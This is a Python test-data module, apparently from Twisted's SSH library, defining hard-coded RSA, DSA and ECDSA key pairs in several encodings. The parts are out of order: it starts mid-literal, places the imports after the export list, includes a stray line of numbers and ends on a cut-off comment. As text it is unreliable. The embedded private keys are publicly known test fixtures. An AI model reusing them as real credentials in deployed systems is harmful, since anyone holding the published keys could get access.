b"(11:private-key(9:rsa-pkcs1(1:n257:\x00\xd5j\xacx#\xd6\xd6\x1b\xec%\xa1P"
b"\xc4wcP\x84E\x01UB\x14**\xe0\xd0`\xee\xd4\xe9\xa3\xadJ\xfa9\x06^\x84Uu_"
b"\x006\xbfo\xaa*?\x83&7\xc1i.[\xfd\xf0\xf3\xd2}\xd6\x98\xcd:@x\xd5\xca"
b"\xa8\x18\xc0\x11\x93$\t\x0c\x81L\x8f\xf7\x9c\xed\x13\x16j\xa4\x04\xe9Iw"
b"\xc3\xe4Ud\xb3yh\x9e,\x08\xeb\xac\xe8\x04-!w\x05\xa7\x8e\xefS0\r\xa5\xe5"
b"\xbb=j\xe2\t6o\xfd4\xd3}oF\xff\x87\xda\xa9)'\xaa\xff\xad\xf5\x85\xe6>"
b"\x1a\xb8z\x1dJ\xb1\xea\xc0Z\xf70\xdf\x1f\xc2\xa4\xe4\xef?\x91I\x96@\xd5"
b"\x19w-7\xc3^\xec\x9d\xa6:D\xa5\xc2\xa4)\xdd\xd5\xba\x9c=E\xb3\xc6,\x18d"
b"\xd5\xba=\xdf\xab\x7f\xcdB\xac\xa7\xf1\x18\x0b\xa0X\x15b\x0b\xa4*nC\xc3"
b"\xe4\x04\x9f5\xa3G\x8eF\xed3\xa5e\xbd\xbc;)n\x02\x0bW\xdft\xe8\x13\xb475"
b"~\x83_ &`\xa6\xdc\xad\x8b\xc6ly\x98\xf7)(1:e3:\x01\x00\x01)(1:d256:!L"
b"\x08f\xa2(\xd5\xb4\xfb\x8e\x0fr\x1b\x85\t\x00\xb9\xf2N7\xf0\x1cWK\xe3Q"
b"\x7f\x9e#\xa7\xe4:\x98U\x1b\xea\x8bz\x98\x1e\xbc\xd8\xba\xb1\xf9\x89\x12"
b"\x18`\xac\xe8\xcc\x0bN\tZ@j\xba/\x99\xf8\xb3$`\x84\xb9\xcei\x95\x9a\xf9"
b"\xe2\xfc\x1fQM'\x15\xdb+'\xad\xef\xb4i\xac\xbe}\x10\xeb\x86Gps\xb4\x00"
b"\x87\x95\x15;7\xf9\xe7\x14\xe7\x80\xbbh\x1e\x1b\xe6\xdd\xbbsc\xb9g\xe6"
b"\xb2'\x7f\xcf\xcf0\x9b\xc2\x98\xfd\xd9\x186/6.\xf1=\x81z\x9f\xe1\x03-G"
b"\xdb4Qb9\xddO\xe9\xac\xa8\x8b\xd9\xd6\xf3\x84\xc4\x17\xb9q\x9d\x06\x08Bx"
b"M\xbb\xc5*\xf4\xc3X\xcdU+\xed\xbe3_\x04\xea{\xe6\x04$c\xf2-\xd7=\x1bl"
b"\xd5\x9ccC/\x92\x88\x8d>n\xda\x187\xd8\x0f%g\x89\x1d\xb9F4^\xc9\xce\xc4"
b"\x8b\xed\x92Z3\x07\x0f\xdf\x86\x08\xf9\x92\xe9\xdb\xeb8\x086\xc9\xcd\xcd"
b"\n\x01H[9>z\xca\xc6\x80\xa9\xdc\xd49)(1:p129:\x00\xfbD\x17\x8b\xa46\xbe"
b"\x1e7\x1d\xa7\xf6al\x04\xc4\xaa\xddx>\x07\x8c\x1e3\x02\xae\x03\x14\x87"
b"\x83z\xe5\x9e}\x08g\xa8\xf2\xaa\xbf\x12p\xcfr\xa9\xa7\xc7\x0b\x1d\x88"
b"\xd5 \xfd\x9cc\xcaG0UN\x8b\xc4\xcf\xf4\x7f\x16\xa4\x92\x12t\xa1\t\xc2"
b"\xc4n\x9c\x8c3\xef\xa5\xe5\xf7\xe0+\xadO\\\x11\xaa\x1a\x847[\xfdz\xea"
b"\xc3\xcd|\xb0\xc8\xe4\x1fTc\xb5\xc7\xaf\xdf\xf4\t\xa7\xfc\xc7%\xfc\\\xe9"
b"\x91\xd7\x92\xc5\x98\x1eV\xd3\xb1#)(1:q129:\x00\xd9p\x06\xd8\xe2\xbc\xd4"
b"x\x91P\x94\xd4\xc1\x1b\x898lFdZQ\xa0\x9a\x07=H\x8f\x03Q\xcck\x12\x8e}"
b"\x1a\xb1e\xe7qu9\xe02\x05u\x8d\x18L\xaf\x93\xb1I\xb1f_xbz\xd1\x0c\xca"
b"\xe6MC\xb3\x9c\xf4k}\xe6\x0c\x98\xdc\xcf!b\x8e\xd5.\x12\xde\x04\xae\xd7$"
b"n\x831\xa2\x15\xa2D=\"\xa9b&\"\xb9\xb2\xedT\n\x9d\x08\x83\xa7\x07\r\xff"
b"\x19\x18\x8e\xd8\xab\x1d\xdaH\x9c1h\x11\xa1fm\xe3\xd8\x1d)(1:a128:if7"
b"\xc6@\xdd!\xc5\x04\xf3\xb0\xb8>G\x94|v\xfc-\xeb?9<\x95\xc3C\x01Q\xc4B"
b"\x97\xf3\xe8\x16\xa4\xc6\xee\xec\xd4I\x10P8\x04\xee;\xcd\xd7\xd0\xcc\xcc"
b"2i\x90\x07\xa0\x1bZ\x9f\xfe1\xcd\x1e:~q\x1e\x19\x94\x1aNO\x0c\xdf_R\xd5"
b"\xd1\x17n\xec\xd7\x9c\xb6U\x9d\xdb\x8e!_\xbc$\x88\xb6\xfc\xaf\xab\xf0"
b"\xef\xa4,\xb0\xdc\x9f\x86\xb0\x03\x12\xb8\x8b\xe2\xdd\x0f\xc0\xee#=JP"
b"\xfe/\xb8)FX\xbf\xb6')(1:b128:Q\xaf\xe9\x92\x9f\x94\x0bJ\x84e>\x94\xb3;"
b"\x92\x10\xb5t\xb8\x8c\xc9\xef\xc9\x0e\x012\xfa/h\x12\xa1\x03&\xae\xcfQh"
b"\x14L&\x9b(\xa4\x023\x08_\xe1\xa7p\x98\x014y^R\x8e\xc4\xcf6\xbc\x1fKU"
b"\xac\xeb\xc1S\x84\xc7\xe1a\xa8J\xd4\xa2\xff@\r\x80\x1f\x12\xa9P\xc0*\x18"
b"u\x94\x0c\x06\x9b\x16P\xa8K\xecA\xcd{\xef\xf7K\xc9u\x02h\xc4\x98\xb8\x86"
b"\x88\x18ZC\xe7\x023\x97\"d\x93\x83\x0cE*|\xed)(1:c129:\x00\x85K\x1bz\x9b"
b"\x12\x107\x9e\x1f\xad^\xda\xfe\xc6\x96\xfe\xdf5k\xb94\xe2\x16\x97\x92&\t"
b"\xbd\xbdp \x03\xa75\xbd-\x1b\xa0\xd2\x07G+\xd4\xde\xa8\xa8\x07\x07\x1b"
b"\xb8\x04 \xa7'A<l99\xe9A\xce\xe7\x17\x1d\xd1L\\\xbc=\xd2&&\xfej\xd6\xfd"
b"Hr\xaeF\xfa{\xc3\xd3\x19`D\x1d\xa5\x13\xa7\x80\xf5c)\xd4z]\x06\x07\x16]"
b"\xf6\x8b=\xcbd:\xe2\x84ZM\x8c\x06--\x9d\x1c\xeb\x83Lx=yT\xce)))"
)
privateRSA_agentv3 = (
b"\x00\x00\x00\x07ssh-rsa\x00\x00\x00\x03\x01\x00\x01\x00\x00\x01\x00!L"
b"\x08f\xa2(\xd5\xb4\xfb\x8e\x0fr\x1b\x85\t\x00\xb9\xf2N7\xf0\x1cWK\xe3Q"
b"\x7f\x9e#\xa7\xe4:\x98U\x1b\xea\x8bz\x98\x1e\xbc\xd8\xba\xb1\xf9\x89\x12"
b"\x18`\xac\xe8\xcc\x0bN\tZ@j\xba/\x99\xf8\xb3$`\x84\xb9\xcei\x95\x9a\xf9"
b"\xe2\xfc\x1fQM'\x15\xdb+'\xad\xef\xb4i\xac\xbe}\x10\xeb\x86Gps\xb4\x00"
b"\x87\x95\x15;7\xf9\xe7\x14\xe7\x80\xbbh\x1e\x1b\xe6\xdd\xbbsc\xb9g\xe6"
b"\xb2'\x7f\xcf\xcf0\x9b\xc2\x98\xfd\xd9\x186/6.\xf1=\x81z\x9f\xe1\x03-G"
b"\xdb4Qb9\xddO\xe9\xac\xa8\x8b\xd9\xd6\xf3\x84\xc4\x17\xb9q\x9d\x06\x08Bx"
b"M\xbb\xc5*\xf4\xc3X\xcdU+\xed\xbe3_\x04\xea{\xe6\x04$c\xf2-\xd7=\x1bl"
b"\xd5\x9ccC/\x92\x88\x8d>n\xda\x187\xd8\x0f%g\x89\x1d\xb9F4^\xc9\xce\xc4"
b"\x8b\xed\x92Z3\x07\x0f\xdf\x86\x08\xf9\x92\xe9\xdb\xeb8\x086\xc9\xcd\xcd"
b"\n\x01H[9>z\xca\xc6\x80\xa9\xdc\xd49\x00\x00\x01\x01\x00\xd5j\xacx#\xd6"
b"\xd6\x1b\xec%\xa1P\xc4wcP\x84E\x01UB\x14**\xe0\xd0`\xee\xd4\xe9\xa3\xadJ"
b"\xfa9\x06^\x84Uu_\x006\xbfo\xaa*?\x83&7\xc1i.[\xfd\xf0\xf3\xd2}\xd6\x98"
b"\xcd:@x\xd5\xca\xa8\x18\xc0\x11\x93$\t\x0c\x81L\x8f\xf7\x9c\xed\x13\x16j"
b"\xa4\x04\xe9Iw\xc3\xe4Ud\xb3yh\x9e,\x08\xeb\xac\xe8\x04-!w\x05\xa7\x8e"
b"\xefS0\r\xa5\xe5\xbb=j\xe2\t6o\xfd4\xd3}oF\xff\x87\xda\xa9)'\xaa\xff\xad"
b"\xf5\x85\xe6>\x1a\xb8z\x1dJ\xb1\xea\xc0Z\xf70\xdf\x1f\xc2\xa4\xe4\xef?"
b"\x91I\x96@\xd5\x19w-7\xc3^\xec\x9d\xa6:D\xa5\xc2\xa4)\xdd\xd5\xba\x9c=E"
b"\xb3\xc6,\x18d\xd5\xba=\xdf\xab\x7f\xcdB\xac\xa7\xf1\x18\x0b\xa0X\x15b"
b"\x0b\xa4*nC\xc3\xe4\x04\x9f5\xa3G\x8eF\xed3\xa5e\xbd\xbc;)n\x02\x0bW\xdf"
b"t\xe8\x13\xb475~\x83_ &`\xa6\xdc\xad\x8b\xc6ly\x98\xf7\x00\x00\x00\x81"
b"\x00\x85K\x1bz\x9b\x12\x107\x9e\x1f\xad^\xda\xfe\xc6\x96\xfe\xdf5k\xb94"
b"\xe2\x16\x97\x92&\t\xbd\xbdp \x03\xa75\xbd-\x1b\xa0\xd2\x07G+\xd4\xde"
b"\xa8\xa8\x07\x07\x1b\xb8\x04 \xa7'A<l99\xe9A\xce\xe7\x17\x1d\xd1L\\\xbc="
b"\xd2&&\xfej\xd6\xfdHr\xaeF\xfa{\xc3\xd3\x19`D\x1d\xa5\x13\xa7\x80\xf5c)"
b"\xd4z]\x06\x07\x16]\xf6\x8b=\xcbd:\xe2\x84ZM\x8c\x06--\x9d\x1c\xeb\x83Lx"
b"=yT\xce\x00\x00\x00\x81\x00\xd9p\x06\xd8\xe2\xbc\xd4x\x91P\x94\xd4\xc1"
b"\x1b\x898lFdZQ\xa0\x9a\x07=H\x8f\x03Q\xcck\x12\x8e}\x1a\xb1e\xe7qu9\xe02"
b"\x05u\x8d\x18L\xaf\x93\xb1I\xb1f_xbz\xd1\x0c\xca\xe6MC\xb3\x9c\xf4k}\xe6"
b"\x0c\x98\xdc\xcf!b\x8e\xd5.\x12\xde\x04\xae\xd7$n\x831\xa2\x15\xa2D=\""
b"\xa9b&\"\xb9\xb2\xedT\n\x9d\x08\x83\xa7\x07\r\xff\x19\x18\x8e\xd8\xab"
b"\x1d\xdaH\x9c1h\x11\xa1fm\xe3\xd8\x1d\x00\x00\x00\x81\x00\xfbD\x17\x8b"
b"\xa46\xbe\x1e7\x1d\xa7\xf6al\x04\xc4\xaa\xddx>\x07\x8c\x1e3\x02\xae\x03"
b"\x14\x87\x83z\xe5\x9e}\x08g\xa8\xf2\xaa\xbf\x12p\xcfr\xa9\xa7\xc7\x0b"
b"\x1d\x88\xd5 \xfd\x9cc\xcaG0UN\x8b\xc4\xcf\xf4\x7f\x16\xa4\x92\x12t\xa1"
b"\t\xc2\xc4n\x9c\x8c3\xef\xa5\xe5\xf7\xe0+\xadO\\\x11\xaa\x1a\x847[\xfdz"
b"\xea\xc3\xcd|\xb0\xc8\xe4\x1fTc\xb5\xc7\xaf\xdf\xf4\t\xa7\xfc\xc7%\xfc\\"
b"\xe9\x91\xd7\x92\xc5\x98\x1eV\xd3\xb1#"
)
publicDSA_openssh = b"""\
ssh-dss AAAAB3NzaC1kc3MAAACBAJKQOsVERVDQIpANHH+JAAylo9\
LvFYmFFVMIuHFGlZpIL7sh3IMkqy+cssINM/lnHD3fmsAyLlUXZtt6PD9LgZRazsPOgptuH+Gu48G\
+yFuE8l0fVVUivos/MmYVJ66qT99htcZKatrTWZnpVW7gFABoqw+he2LZ0gkeU0+Sx9a5AAAAFQD0\
EYmTNaFJ8CS0+vFSF4nYcyEnSQAAAIEAkgLjxHJAE7qFWdTqf7EZngu7jAGmdB9k3YzMHe1ldMxEB\
7zNw5aOnxjhoYLtiHeoEcOk2XOyvnE+VfhIWwWAdOiKRTEZlmizkvhGbq0DCe2EPMXirjqWACI5nD\
ioQX1oEMonR8N3AEO5v9SfBqS2Q9R6OBr6lf04RvwpHZ0UGu8AAACAAhRpxGMIWEyaEh8YnjiazQT\
NEpklRZqeBGo1gotJggNmVaIQNIClGlLyCi359efEUuQcZ9SXxM59P+hecc/GU/GHakW5YWE4dP2G\
gdgMQWC7S6WFIXePGGXqNQDdWxlX8umhenvQqa1PnKrFRhDrJw8Z7GjdHxflsxCEmXPoLN8= \
comment\
"""
privateDSA_openssh = b"""\
-----BEGIN DSA PRIVATE KEY-----
MIIBvAIBAAKBgQCSkDrFREVQ0CKQDRx/iQAMpaPS7xWJhRVTCLhxRpWaSC+7IdyD
JKsvnLLCDTP5Zxw935rAMi5VF2bbejw/S4GUWs7DzoKbbh/hruPBvshbhPJdH1VV
Ir6LPzJmFSeuqk/fYbXGSmra01mZ6VVu4BQAaKsPoXti2dIJHlNPksfWuQIVAPQR
iZM1oUnwJLT68VIXidhzISdJAoGBAJIC48RyQBO6hVnU6n+xGZ4Lu4wBpnQfZN2M
zB3tZXTMRAe8zcOWjp8Y4aGC7Yh3qBHDpNlzsr5xPlX4SFsFgHToikUxGZZos5L4
Rm6tAwnthDzF4q46lgAiOZw4qEF9aBDKJ0fDdwBDub/UnwaktkPUejga+pX9OEb8
KR2dFBrvAoGAAhRpxGMIWEyaEh8YnjiazQTNEpklRZqeBGo1gotJggNmVaIQNICl
GlLyCi359efEUuQcZ9SXxM59P+hecc/GU/GHakW5YWE4dP2GgdgMQWC7S6WFIXeP
GGXqNQDdWxlX8umhenvQqa1PnKrFRhDrJw8Z7GjdHxflsxCEmXPoLN8CFQDV2gbL
czUdxCus0pfEP1bddaXRLQ==
-----END DSA PRIVATE KEY-----\
"""
publicDSA_lsh = decodebytes(b"""\
e0tERXdPbkIxWW14cFl5MXJaWGtvTXpwa2MyRW9NVHB3TVRJNU9nQ1NrRHJGUkVWUTBDS1FEUngv
aVFBTXBhUFM3eFdKaFJWVENMaHhScFdhU0MrN0lkeURKS3N2bkxMQ0RUUDVaeHc5MzVyQU1pNVZG
MmJiZWp3L1M0R1VXczdEem9LYmJoL2hydVBCdnNoYmhQSmRIMVZWSXI2TFB6Sm1GU2V1cWsvZlli
WEdTbXJhMDFtWjZWVnU0QlFBYUtzUG9YdGkyZElKSGxOUGtzZld1U2tvTVRweE1qRTZBUFFSaVpN
MW9VbndKTFQ2OFZJWGlkaHpJU2RKS1NneE9tY3hNams2QUpJQzQ4UnlRQk82aFZuVTZuK3hHWjRM
dTR3QnBuUWZaTjJNekIzdFpYVE1SQWU4emNPV2pwOFk0YUdDN1loM3FCSERwTmx6c3I1eFBsWDRT
RnNGZ0hUb2lrVXhHWlpvczVMNFJtNnRBd250aER6RjRxNDZsZ0FpT1p3NHFFRjlhQkRLSjBmRGR3
QkR1Yi9Vbndha3RrUFVlamdhK3BYOU9FYjhLUjJkRkJydktTZ3hPbmt4TWpnNkFoUnB4R01JV0V5
YUVoOFluamlhelFUTkVwa2xSWnFlQkdvMWdvdEpnZ05tVmFJUU5JQ2xHbEx5Q2kzNTllZkVVdVFj
WjlTWHhNNTlQK2hlY2MvR1UvR0hha1c1WVdFNGRQMkdnZGdNUVdDN1M2V0ZJWGVQR0dYcU5RRGRX
eGxYOHVtaGVudlFxYTFQbktyRlJoRHJKdzhaN0dqZEh4ZmxzeENFbVhQb0xOOHBLU2s9fQ==
""")
privateDSA_lsh = decodebytes(b"""\
KDExOnByaXZhdGUta2V5KDM6ZHNhKDE6cDEyOToAkpA6xURFUNAikA0cf4kADKWj0u8ViYUVUwi4
cUaVmkgvuyHcgySrL5yywg0z+WccPd+awDIuVRdm23o8P0uBlFrOw86Cm24f4a7jwb7IW4TyXR9V
VSK+iz8yZhUnrqpP32G1xkpq2tNZmelVbuAUAGirD6F7YtnSCR5TT5LH1rkpKDE6cTIxOgD0EYmT
NaFJ8CS0+vFSF4nYcyEnSSkoMTpnMTI5OgCSAuPEckATuoVZ1Op/sRmeC7uMAaZ0H2TdjMwd7WV0
zEQHvM3Dlo6fGOGhgu2Id6gRw6TZc7K+cT5V+EhbBYB06IpFMRmWaLOS+EZurQMJ7YQ8xeKuOpYA
IjmcOKhBfWgQyidHw3cAQ7m/1J8GpLZD1Ho4GvqV/ThG/CkdnRQa7ykoMTp5MTI4OgIUacRjCFhM
mhIfGJ44ms0EzRKZJUWangRqNYKLSYIDZlWiEDSApRpS8got+fXnxFLkHGfUl8TOfT/oXnHPxlPx
h2pFuWFhOHT9hoHYDEFgu0ulhSF3jxhl6jUA3VsZV/LpoXp70KmtT5yqxUYQ6ycPGexo3R8X5bMQ
hJlz6CzfKSgxOngyMToA1doGy3M1HcQrrNKXxD9W3XWl0S0pKSk=
""")
privateDSA_agentv3 = decodebytes(b"""\
AAAAB3NzaC1kc3MAAACBAJKQOsVERVDQIpANHH+JAAylo9LvFYmFFVMIuHFGlZpIL7sh3IMkqy+c
ssINM/lnHD3fmsAyLlUXZtt6PD9LgZRazsPOgptuH+Gu48G+yFuE8l0fVVUivos/MmYVJ66qT99h
tcZKatrTWZnpVW7gFABoqw+he2LZ0gkeU0+Sx9a5AAAAFQD0EYmTNaFJ8CS0+vFSF4nYcyEnSQAA
AIEAkgLjxHJAE7qFWdTqf7EZngu7jAGmdB9k3YzMHe1ldMxEB7zNw5aOnxjhoYLtiHeoEcOk2XOy
vnE+VfhIWwWAdOiKRTEZlmizkvhGbq0DCe2EPMXirjqWACI5nDioQX1oEMonR8N3AEO5v9SfBqS2
Q9R6OBr6lf04RvwpHZ0UGu8AAACAAhRpxGMIWEyaEh8YnjiazQTNEpklRZqeBGo1gotJggNmVaIQ
NIClGlLyCi359efEUuQcZ9SXxM59P+hecc/GU/GHakW5YWE4dP2GgdgMQWC7S6WFIXePGGXqNQDd
WxlX8umhenvQqa1PnKrFRhDrJw8Z7GjdHxflsxCEmXPoLN8AAAAVANXaBstzNR3EK6zSl8Q/Vt11
pdEt
""")
__all__ = ['DSAData', 'RSAData', 'privateDSA_agentv3', 'privateDSA_lsh',
'privateDSA_openssh', 'privateRSA_agentv3', 'privateRSA_lsh',
'privateRSA_openssh', 'publicDSA_lsh', 'publicDSA_openssh',
'publicRSA_lsh', 'publicRSA_openssh', 'privateRSA_openssh_alternate']
| 61.058559 | 92 | 0.819993 |
from __future__ import absolute_import, division
from twisted.python.compat import long, _b64decodebytes as decodebytes
RSAData = {
'n': long('269413617238113438198661010376758399219880277968382122687862697'
'296942471209955603071120391975773283844560230371884389952067978'
'789684135947515341209478065209455427327369102356204259106807047'
'964139525310539133073743116175821417513079706301100600025815509'
'786721808719302671068052414466483676821987505720384645561708425'
'794379383191274856941628512616355437197560712892001107828247792'
'561858327085521991407807015047750218508971611590850575870321007'
'991909043252470730134547038841839367764074379439843108550888709'
'430958143271417044750314742880542002948053835745429446485015316'
'60749404403945254975473896534482849256068133525751'),
'e': long(65537),
'd': long('420335724286999695680502438485489819800002417295071059780489811'
'840828351636754206234982682752076205397047218449504537476523960'
'987613148307573487322720481066677105211155388802079519869249746'
'774085882219244493290663802569201213676433159425782937159766786'
'329742053214957933941260042101377175565683849732354700525628975'
'239000548651346620826136200952740446562751690924335365940810658'
'931238410612521441739702170503547025018016868116037053013935451'
'477930426013703886193016416453215950072147440344656137718959053'
'897268663969428680144841987624962928576808352739627262941675617'
'7724661940425316604626522633351193810751757014073'),
'p': long('152689878451107675391723141129365667732639179427453246378763774'
'448531436802867910180261906924087589684175595016060014593521649'
'964959248408388984465569934780790357826811592229318702991401054'
'226302790395714901636384511513449977061729214247279176398290513'
'085108930550446985490864812445551198848562639933888780317'),
'q': long('176444974592327996338888725079951900172097062203378367409936859'
'072670162290963119826394224277287608693818012745872307600855894'
'647300295516866118620024751601329775653542084052616260193174546'
'400544176890518564317596334518015173606460860373958663673307503'
'231977779632583864454001476729233959405710696795574874403'),
'u': long('936018002388095842969518498561007090965136403384715613439364803'
'229386793506402222847415019772053080458257034241832795210460612'
'924445085372678524176842007912276654532773301546269997020970818'
'155956828553418266110329867222673040098885651348225673298948529'
'93885224775891490070400861134282266967852120152546563278')
}
DSAData = {
'g': long("10253261326864117157640690761723586967382334319435778695"
"29171533815411392477819921538350732400350395446211982054"
"96512489289702949127531056893725702005035043292195216541"
"11525058911428414042792836395195432445511200566318251789"
"10575695836669396181746841141924498545494149998282951407"
"18645344764026044855941864175"),
'p': long("10292031726231756443208850082191198787792966516790381991"
"77502076899763751166291092085666022362525614129374702633"
"26262930887668422949051881895212412718444016917144560705"
"45675251775747156453237145919794089496168502517202869160"
"78674893099371444940800865897607102159386345313384716752"
"18590012064772045092956919481"),
'q': long(1393384845225358996250882900535419012502712821577),
'x': long(1220877188542930584999385210465204342686893855021),
'y': long("14604423062661947579790240720337570315008549983452208015"
"39426429789435409684914513123700756086453120500041882809"
"10283610277194188071619191739512379408443695946763554493"
"86398594314468629823767964702559709430618263927529765769"
"10270265745700231533660131769648708944711006508965764877"
"684264272082256183140297951")
}
ECDatanistp256 = {
'x': long('762825130203920963171185031449647317742997734817505505433829043'
'45687059013883'),
'y': long('815431978646028526322656647694416475343443758943143196810611371'
'59310646683104'),
'privateValue': long('3463874347721034170096400845565569825355565567882605'
'9678074967909361042656500'),
'curve': b'ecdsa-sha2-nistp256'
}
ECDatanistp384 = {
'privateValue': long('280814107134858470598753916394807521398239633534281633982576099083'
'35787109896602102090002196616273211495718603965098'),
'x': long('10036914308591746758780165503819213553101287571902957054148542'
'504671046744460374996612408381962208627004841444205030'),
'y': long('17337335659928075994560513699823544906448896792102247714689323'
'575406618073069185107088229463828921069465902299522926'),
'curve': b'ecdsa-sha2-nistp384'
}
ECDatanistp521 = {
'x': long('12944742826257420846659527752683763193401384271391513286022917'
'29910013082920512632908350502247952686156279140016049549948975'
'670668730618745449113644014505462'),
'y': long('10784108810271976186737587749436295782985563640368689081052886'
'16296815984553198866894145509329328086635278430266482551941240'
'591605833440825557820439734509311'),
'privateValue': long('662751235215460886290293902658128847495347691199214706697089140769'
'672273950767961331442265530524063943548846724348048614239791498442'
'5997823106818915698960565'),
'curve': b'ecdsa-sha2-nistp521'
}
privateECDSA_openssh521 = b"""-----BEGIN EC PRIVATE KEY-----
MIHcAgEBBEIAjn0lSVF6QweS4bjOGP9RHwqxUiTastSE0MVuLtFvkxygZqQ712oZ
ewMvqKkxthMQgxzSpGtRBcmkL7RqZ94+18qgBwYFK4EEACOhgYkDgYYABAFpX/6B
mxxglwD+VpEvw0hcyxVzLxNnMGzxZGF7xmNj8nlF7M+TQctdlR2Xv/J+AgIeVGmB
j2p84bkV9jBzrUNJEACsJjttZw8NbUrhxjkLT/3rMNtuwjE4vLja0P7DMTE0EV8X
f09ETdku/z/1tOSSrSvRwmUcM9nQUJtHHAZlr5Q0fw==
-----END EC PRIVATE KEY-----"""
publicECDSA_openssh521 = (b"ecdsa-sha2-nistp521 AAAAE2VjZHNhLXNoYTItbmlzdHA"
b"1MjEAAAAIbmlzdHA1MjEAAACFBAFpX/6BmxxglwD+VpEvw0hcyxVzLxNnMGzxZGF7xmNj8nlF7"
b"M+TQctdlR2Xv/J+AgIeVGmBj2p84bkV9jBzrUNJEACsJjttZw8NbUrhxjkLT/3rMNtuwjE4vLja"
b"0P7DMTE0EV8Xf09ETdku/z/1tOSSrSvRwmUcM9nQUJtHHAZlr5Q0fw== comment")
privateECDSA_openssh384 = b"""-----BEGIN EC PRIVATE KEY-----
MIGkAgEBBDAtAi7I8j73WCX20qUM5hhHwHuFzYWYYILs2Sh8UZ+awNkARZ/Fu2LU
LLl5RtOQpbWgBwYFK4EEACKhZANiAATU17sA9P5FRwSknKcFsjjsk0+E3CeXPYX0
Tk/M0HK3PpWQWgrO8JdRHP9eFE9O/23P8BumwFt7F/AvPlCzVd35VfraFT0o4cCW
G0RqpQ+np31aKmeJshkcYALEchnU+tQ=
-----END EC PRIVATE KEY-----"""
publicECDSA_openssh384 = (b"ecdsa-sha2-nistp384 AAAAE2VjZHNhLXNoYTItbmlzdHAzOD"
b"QAAAAIbmlzdHAzODQAAABhBNTXuwD0/kVHBKScpwWyOOyTT4TcJ5c9hfROT8zQcrc+lZBaCs7wl"
b"1Ec/14UT07/bc/wG6bAW3sX8C8+ULNV3flV+toVPSjhwJYbRGqlD6enfVoqZ4myGRxgAsRyGdT61A== comment")
publicECDSA_openssh = (b"ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAA"
b"AAIbmlzdHAyNTYAAABBBKimX1DZ7+Qj0SpfePMbo1pb6yGkAb5l7duC1l855yD7tEfQfqk7bc7v"
b"46We1hLMyz6ObUBYgkN/34n42F4vpeA= comment")
privateECDSA_openssh = b"""-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIEyU1YOT2JxxofwbJXIjGftdNcJK55aQdNrhIt2xYQz0oAoGCCqGSM49
AwEHoUQDQgAEqKZfUNnv5CPRKl948xujWlvrIaQBvmXt24LWXznnIPu0R9B+qTtt
zu/jpZ7WEszLPo5tQFiCQ3/fifjYXi+l4A==
-----END EC PRIVATE KEY-----"""
publicRSA_openssh = (b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVaqx4I9bWG+wloV"
b"DEd2NQhEUBVUIUKirg0GDu1OmjrUr6OQZehFV1XwA2v2+qKj+DJjfBaS5b/fDz0n3WmM06QHjVy"
b"qgYwBGTJAkMgUyP95ztExZqpATpSXfD5FVks3loniwI66zoBC0hdwWnju9TMA2l5bs9auIJNm/9"
b"NNN9b0b/h9qpKSeq/631heY+Grh6HUqx6sBa9zDfH8Kk5O8/kUmWQNUZdy03w17snaY6RKXCpCn"
b"d1bqcPUWzxiwYZNW6Pd+rf81CrKfxGAugWBViC6QqbkPD5ASfNaNHjkbtM6Vlvbw7KW4CC1ffdO"
b"gTtDc1foNfICZgptyti8ZseZj3 comment")
privateRSA_openssh = b'''-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA1WqseCPW1hvsJaFQxHdjUIRFAVVCFCoq4NBg7tTpo61K+jkG
XoRVdV8ANr9vqio/gyY3wWkuW/3w89J91pjNOkB41cqoGMARkyQJDIFMj/ec7RMW
aqQE6Ul3w+RVZLN5aJ4sCOus6AQtIXcFp47vUzANpeW7PWriCTZv/TTTfW9G/4fa
qSknqv+t9YXmPhq4eh1KserAWvcw3x/CpOTvP5FJlkDVGXctN8Ne7J2mOkSlwqQp
3dW6nD1Fs8YsGGTVuj3fq3/NQqyn8RgLoFgVYgukKm5Dw+QEnzWjR45G7TOlZb28
OyluAgtX33ToE7Q3NX6DXyAmYKbcrYvGbHmY9wIDAQABAoIBACFMCGaiKNW0+44P
chuFCQC58k438BxXS+NRf54jp+Q6mFUb6ot6mB682Lqx+YkSGGCs6MwLTglaQGq6
L5n4syRghLnOaZWa+eL8H1FNJxXbKyet77RprL59EOuGR3BztACHlRU7N/nnFOeA
u2geG+bdu3NjuWfmsid/z88wm8KY/dkYNi82LvE9gXqf4QMtR9s0UWI53U/prKiL
2dbzhMQXuXGdBghCeE27xSr0w1jNVSvtvjNfBOp75gQkY/It1z0bbNWcY0MvkoiN
Pm7aGDfYDyVniR25RjReyc7Ei+2SWjMHD9+GCPmS6dvrOAg2yc3NCgFIWzk+esrG
gKnc1DkCgYEA2XAG2OK81HiRUJTUwRuJOGxGZFpRoJoHPUiPA1HMaxKOfRqxZedx
dTngMgV1jRhMr5OxSbFmX3hietEMyuZNQ7Oc9Gt95gyY3M8hYo7VLhLeBK7XJG6D
MaIVokQ9IqliJiK5su1UCp0Ig6cHDf8ZGI7Yqx3aSJwxaBGhZm3j2B0CgYEA+0QX
i6Q2vh43Haf2YWwExKrdeD4HjB4zAq4DFIeDeuWefQhnqPKqvxJwz3Kpp8cLHYjV
IP2cY8pHMFVOi8TP9H8WpJISdKEJwsRunIwz76Xl9+ArrU9cEaoahDdb/Xrqw818
sMjkH1Rjtcev3/QJp/zHJfxc6ZHXksWYHlbTsSMCgYBRr+mSn5QLSoRlPpSzO5IQ
tXS4jMnvyQ4BMvovaBKhAyauz1FoFEwmmyikAjMIX+GncJgBNHleUo7Ezza8H0tV
rOvBU4TH4WGoStSi/0ANgB8SqVDAKhh1lAwGmxZQqEvsQc177/dLyXUCaMSYuIaI
GFpD5wIzlyJkk4MMRSp87QKBgGlmN8ZA3SHFBPOwuD5HlHx2/C3rPzk8lcNDAVHE
Qpfz6Bakxu7s1EkQUDgE7jvN19DMzDJpkAegG1qf/jHNHjp+cR4ZlBpOTwzfX1LV
0Rdu7NectlWd244hX7wkiLb8r6vw76QssNyfhrADEriL4t0PwO4jPUpQ/i+4KUZY
v7YnAoGBAIVLG3qbEhA3nh+tXtr+xpb+3zVruTTiFpeSJgm9vXAgA6c1vS0boNIH
RyvU3qioBwcbuAQgpydBPGw5OelBzucXHdFMXLw90iYm/mrW/Uhyrkb6e8PTGWBE
HaUTp4D1YynUel0GBxZd9os9y2Q64oRaTYwGLS2dHOuDTHg9eVTO
-----END RSA PRIVATE KEY-----'''
# following it. It is not any standard key format and was probably a bug in
